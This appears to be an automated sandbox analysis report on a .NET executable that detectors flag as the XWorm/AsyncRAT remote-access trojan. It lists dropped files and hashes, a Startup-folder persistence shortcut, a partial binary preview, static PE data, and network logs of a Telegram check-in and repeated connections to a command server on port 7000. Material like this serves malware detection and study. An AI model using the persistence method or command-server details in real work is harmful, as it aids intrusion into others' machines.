MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xa0vhzl1.nck.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\0720XW

Download File

Process:	C:\Users\user\Desktop\Or3dzp4vB1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	5.89370122704237
Encrypted:	false
SSDEEP:	1536:hzNaDl//hUhNJ4tz9D5SXoHZ9bYSFwzDj6FVOb/R6leU25:hhCKTJi9QXo59bYsyDYOb/RZn
MD5:	A1880883FF14F58135FC2DB22F46A8AC
SHA1:	CAE4492FC961EF9CD08BCDBFD5B9B781F6458471
SHA-256:	A02B12E6A3848148CF2FF394D0593C0532C57603F1A8FB74040E668284E33E70
SHA-512:	873E325ED133BFB1B4954FE19578AAF778C074443B1087A5CCE6B8E584A62EA94EC6C6554231E1793609A862339EB0665A31BA34E02D4D68B2043D3475C7726F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\0720XW, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\0720XW, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\0720XW, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g.f.................6..........^T... ...`....@.. ....................................@..................................T..K....`............................................................................... ............... ..H............text...d4... ...6.................. ..`.rsrc........`.......8..............@..@.reloc...............>..............@..B................@T......H........q..p.......&.....................................................(.....r...p. .(T...(.....r...p. .x!..s.........s.........s.........s..........r1..p. ~.H..rI..p. .r...ra..p. ..e..ry..p. LA(..r...p. ..p...((....rd..p. ..5..r\|..p. VY.."(....+."(....+.&(1...&+..+5sd... .... .'..oe...(,...~....-.(M...(?...~....of...&.-..r...p. ....r...p. f$...r...p. ..r..r...p. J....r...p. S....r>..p. F...r...p.r...p. ....*..............j........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk

Download File

Process:	C:\Users\user\Desktop\Or3dzp4vB1.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 12:12:39 2024, mtime=Wed Sep 25 12:12:39 2024, atime=Wed Sep 25 12:12:39 2024, length=81920, window=hide
Category:	dropped
Size (bytes):	739
Entropy (8bit):	5.133755439877885
Encrypted:	false
SSDEEP:	12:8R68s48N+2Chhi1Y//RdQmfLT2ZSjATNHq+uCZfflffzBmV:8R6Qp2G956IhAQwZVtm
MD5:	3C78ECD6002628038A4B567DA4B302DD
SHA1:	9C047545186A658A201EF5146259C1686609C539
SHA-256:	159C731926CEFF8A0BBDD1093044BB8C1B1D50058EDB19DD540D9AA0451AC695
SHA-512:	8872FE766B266D385961CC0FFD516AF8DF2C8A599C9BA752E1D265E7D9A0CAA6012B0749CF733C80026D901752880881374652F494D07522EAE9D6341FA80705
Malicious:	false
Preview:	L..................F.... ......L......L......L....@......................h.:..DG..Yr?.D..U..k0.&...&......Qg._....~.!C.....T.L.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=9Y.i..........................3*N.A.p.p.D.a.t.a...B.V.1.....9Y.`..Roaming.@......EW.=9Y.`..............................R.o.a.m.i.n.g.....T.2..@..9Y.i .0720XW..>......9Y.i9Y.i..........................K...0.7.2.0.X.W.......X...............-.......W............T......C:\Users\user\AppData\Roaming\0720XW........\.....\.....\.....\.....\.0.7.2.0.X.W.`.......X.......562258...........hT..CrF.f4... .zd.?{...,......hT..CrF.f4... .zd.?{...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.89370122704237
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Or3dzp4vB1.exe
File size:	81'920 bytes
MD5:	a1880883ff14f58135fc2db22f46a8ac
SHA1:	cae4492fc961ef9cd08bcdbfd5b9b781f6458471
SHA256:	a02b12e6a3848148cf2ff394d0593c0532c57603f1a8fb74040e668284e33e70
SHA512:	873e325ed133bfb1b4954fe19578aaf778c074443b1087a5cce6b8e584a62ea94ec6c6554231e1793609a862339eb0665a31ba34e02d4d68b2043d3475c7726f
SSDEEP:	1536:hzNaDl//hUhNJ4tz9D5SXoHZ9bYSFwzDj6FVOb/R6leU25:hhCKTJi9QXo59bYsyDYOb/RZn
TLSH:	E5836C1C37E64415F6FFAFB119F17242CA79F6231813A65F34C502CA1623A89CE91AF9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g.f.................6..........^T... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x41545e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x669C67AC [Sun Jul 21 01:43:08 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x15410	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x16000	0x4e6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x18000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x13464	0x13600	5ec880532f03051c73d9b41b80d2f2fb	False	0.571484375	data	5.958841270994602	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x16000	0x4e6	0x600	ae5d9e40d98cf578b7d8b20f75a3924f	False	0.3795572916666667	data	3.7810091073658114	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x18000	0xc	0x200	5d9b7c522240935ed4fef947ae311f7d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x160a0	0x25c	data			0.4652317880794702
RT_MANIFEST	0x162fc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-25T14:06:00.051469+0200	2853685	ETPRO MALWARE Win32/XWorm Checkin via Telegram	1	192.168.2.7	49705	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 14:05:58.962376118 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:05:58.962433100 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:05:58.962558031 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:05:58.968835115 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:05:58.968861103 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:05:59.598000050 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:05:59.598090887 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:05:59.601748943 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:05:59.601766109 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:05:59.602173090 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:05:59.647049904 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:05:59.769186974 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:05:59.815423965 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:06:00.051485062 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:06:00.051568985 CEST	443	49705	149.154.167.220	192.168.2.7
Sep 25, 2024 14:06:00.051640987 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:06:00.200300932 CEST	49705	443	192.168.2.7	149.154.167.220
Sep 25, 2024 14:06:00.388503075 CEST	49706	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:00.393759012 CEST	7000	49706	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:00.394632101 CEST	49706	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:00.431004047 CEST	49706	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:00.436002970 CEST	7000	49706	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:02.074911118 CEST	7000	49706	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:02.075052023 CEST	49706	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:04.100347042 CEST	49706	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:04.101953983 CEST	49707	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:04.105336905 CEST	7000	49706	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:04.107013941 CEST	7000	49707	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:04.107109070 CEST	49707	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:04.123440981 CEST	49707	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:04.128616095 CEST	7000	49707	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:05.778184891 CEST	7000	49707	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:05.778285027 CEST	49707	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:08.569015026 CEST	49707	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:08.570086002 CEST	49708	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:08.574367046 CEST	7000	49707	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:08.575457096 CEST	7000	49708	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:08.575561047 CEST	49708	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:08.591871977 CEST	49708	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:08.596909046 CEST	7000	49708	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:10.263880014 CEST	7000	49708	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:10.267775059 CEST	49708	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:11.600516081 CEST	49708	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:11.604316950 CEST	49709	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:11.605443954 CEST	7000	49708	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:11.609303951 CEST	7000	49709	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:11.609381914 CEST	49709	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:11.644167900 CEST	49709	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:11.649015903 CEST	7000	49709	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:13.294384956 CEST	7000	49709	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:13.295768976 CEST	49709	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:15.929193020 CEST	49709	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:15.931252003 CEST	49714	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:15.934309959 CEST	7000	49709	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:15.936065912 CEST	7000	49714	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:15.936161995 CEST	49714	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:16.234113932 CEST	49714	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:16.239979982 CEST	7000	49714	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:17.622453928 CEST	7000	49714	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:17.622656107 CEST	49714	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:20.351583004 CEST	49714	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:20.355066061 CEST	49716	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:20.357637882 CEST	7000	49714	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:20.360925913 CEST	7000	49716	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:20.362692118 CEST	49716	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:20.386878967 CEST	49716	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:20.391675949 CEST	7000	49716	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:22.027349949 CEST	7000	49716	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:22.027574062 CEST	49716	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:23.944644928 CEST	49716	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:23.946724892 CEST	49717	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:23.949537992 CEST	7000	49716	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:23.951976061 CEST	7000	49717	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:23.952136040 CEST	49717	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:23.968799114 CEST	49717	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:23.975070000 CEST	7000	49717	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:26.218518972 CEST	7000	49717	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:26.218637943 CEST	49717	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:26.218648911 CEST	7000	49717	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:26.218698978 CEST	49717	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:26.218858004 CEST	7000	49717	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:26.219036102 CEST	49717	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:28.490925074 CEST	49717	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:28.492162943 CEST	49718	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:28.497729063 CEST	7000	49717	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:28.499212027 CEST	7000	49718	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:28.499404907 CEST	49718	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:28.516741037 CEST	49718	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:28.523670912 CEST	7000	49718	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:30.169154882 CEST	7000	49718	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:30.169433117 CEST	49718	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:33.194456100 CEST	49718	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:33.196343899 CEST	49719	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:33.201092005 CEST	7000	49718	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:33.202483892 CEST	7000	49719	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:33.202620029 CEST	49719	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:33.225368023 CEST	49719	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:33.230920076 CEST	7000	49719	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:34.875463963 CEST	7000	49719	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:34.875576019 CEST	49719	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:36.490858078 CEST	49719	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:36.491893053 CEST	49720	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:36.495647907 CEST	7000	49719	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:36.496828079 CEST	7000	49720	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:36.496918917 CEST	49720	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:36.513696909 CEST	49720	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:36.518532038 CEST	7000	49720	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:38.184971094 CEST	7000	49720	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:38.185233116 CEST	49720	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:40.337990999 CEST	49720	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:40.339894056 CEST	49721	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:40.342897892 CEST	7000	49720	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:40.344747066 CEST	7000	49721	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:40.344840050 CEST	49721	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:40.361710072 CEST	49721	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:40.366550922 CEST	7000	49721	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:42.262921095 CEST	7000	49721	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:42.263031006 CEST	49721	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:42.263480902 CEST	7000	49721	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:42.263533115 CEST	49721	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:42.553699017 CEST	49721	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:42.555031061 CEST	49722	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:42.559231043 CEST	7000	49721	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:42.559847116 CEST	7000	49722	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:42.559933901 CEST	49722	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:42.576143026 CEST	49722	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:42.581760883 CEST	7000	49722	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:44.232433081 CEST	7000	49722	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:44.232558966 CEST	49722	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:44.756809950 CEST	49722	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:44.758725882 CEST	49723	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:44.762830973 CEST	7000	49722	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:44.764522076 CEST	7000	49723	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:44.764611959 CEST	49723	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:44.780680895 CEST	49723	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:44.785518885 CEST	7000	49723	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:46.628104925 CEST	7000	49723	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:46.628263950 CEST	49723	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:46.647257090 CEST	49723	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:46.648973942 CEST	49724	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:46.652246952 CEST	7000	49723	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:46.654066086 CEST	7000	49724	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:46.654973984 CEST	49724	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:46.669289112 CEST	49724	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:46.675003052 CEST	7000	49724	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:48.326323986 CEST	7000	49724	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:48.326402903 CEST	49724	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:48.943996906 CEST	49724	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:48.946044922 CEST	49725	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:48.948849916 CEST	7000	49724	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:48.950905085 CEST	7000	49725	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:48.951297998 CEST	49725	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:48.985330105 CEST	49725	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:48.992136955 CEST	7000	49725	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:50.675966024 CEST	7000	49725	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:50.676096916 CEST	49725	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:51.037647009 CEST	49725	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:51.038764000 CEST	49726	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:51.043008089 CEST	7000	49725	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:51.043688059 CEST	7000	49726	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:51.043762922 CEST	49726	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:51.058083057 CEST	49726	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:51.062903881 CEST	7000	49726	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:52.715837955 CEST	7000	49726	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:52.718405962 CEST	49726	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:52.736203909 CEST	49726	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:52.738145113 CEST	49727	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:52.741106033 CEST	7000	49726	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:52.743057013 CEST	7000	49727	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:52.743170023 CEST	49727	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:52.759217978 CEST	49727	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:52.764103889 CEST	7000	49727	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:54.423692942 CEST	7000	49727	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:54.423814058 CEST	49727	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:54.854449034 CEST	49727	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:54.856967926 CEST	49728	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:54.861001015 CEST	7000	49727	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:54.863464117 CEST	7000	49728	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:54.863554001 CEST	49728	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:54.920101881 CEST	49728	7000	192.168.2.7	185.196.10.235
Sep 25, 2024 14:06:54.925908089 CEST	7000	49728	185.196.10.235	192.168.2.7
Sep 25, 2024 14:06:56.529825926 CEST	7000	49728	185.196.10.235	192.168.2.7
